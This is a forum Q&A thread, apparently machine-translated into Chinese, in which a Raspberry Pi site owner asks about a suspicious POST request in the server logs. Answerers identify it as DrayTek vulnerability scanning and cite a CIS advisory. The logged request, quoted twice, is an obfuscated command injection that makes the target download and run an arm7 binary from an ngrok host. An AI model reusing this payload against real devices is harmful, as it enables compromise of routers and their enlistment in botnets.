你能确认这个奇怪的 post 请求是一种网络攻击吗?
can you confirm me this strange post request is a kind of cyber attack?
我打开了一个仅用于共享文本信息的网站。后端没有数据库堵塞,也不知道对其进行身份验证。但是,当我查看日志时,我注意到了这个请求:
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
它发生了两次,我的服务器两次都响应 404 响应。但现在我有点担心它。我的网站是 运行 在与我的 ISP 设备连接的覆盆子上。即使我的服务器没有任何 sudo 权限,我想知道他们是否有任何风险?
此外,谁能解释一下这些可疑条目的含义。可能有什么风险?最后,您能否分享一些技巧/在任何设备(树莓派)和互联网之间设置管道时应具备的良好行为。
不用担心。这是一种攻击,但不是针对您的特定站点,而是扫描互联网的大部分区域以查找特定漏洞。
您的服务器以 404 响应的事实意味着它不包含易受攻击的页面。
这会发生在任何暴露于 public 互联网的网站上,并被视为背景噪音的一部分。
我也注意到我的网络服务器上有同样的请求。
以下是有关攻击的更多信息:
https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/
我打开了一个仅用于共享文本信息的网站。后端没有数据库堵塞,也不知道对其进行身份验证。但是,当我查看日志时,我注意到了这个请求:
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
它发生了两次,我的服务器两次都响应 404 响应。但现在我有点担心它。我的网站是 运行 在与我的 ISP 设备连接的覆盆子上。即使我的服务器没有任何 sudo 权限,我想知道他们是否有任何风险?
此外,谁能解释一下这些可疑条目的含义。可能有什么风险?最后,您能否分享一些技巧/在任何设备(树莓派)和互联网之间设置管道时应具备的良好行为。
不用担心。这是一种攻击,但不是针对您的特定站点,而是扫描互联网的大部分区域以查找特定漏洞。 您的服务器以 404 响应的事实意味着它不包含易受攻击的页面。
这会发生在任何暴露于 public 互联网的网站上,并被视为背景噪音的一部分。
我也注意到我的网络服务器上有同样的请求。 以下是有关攻击的更多信息: https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/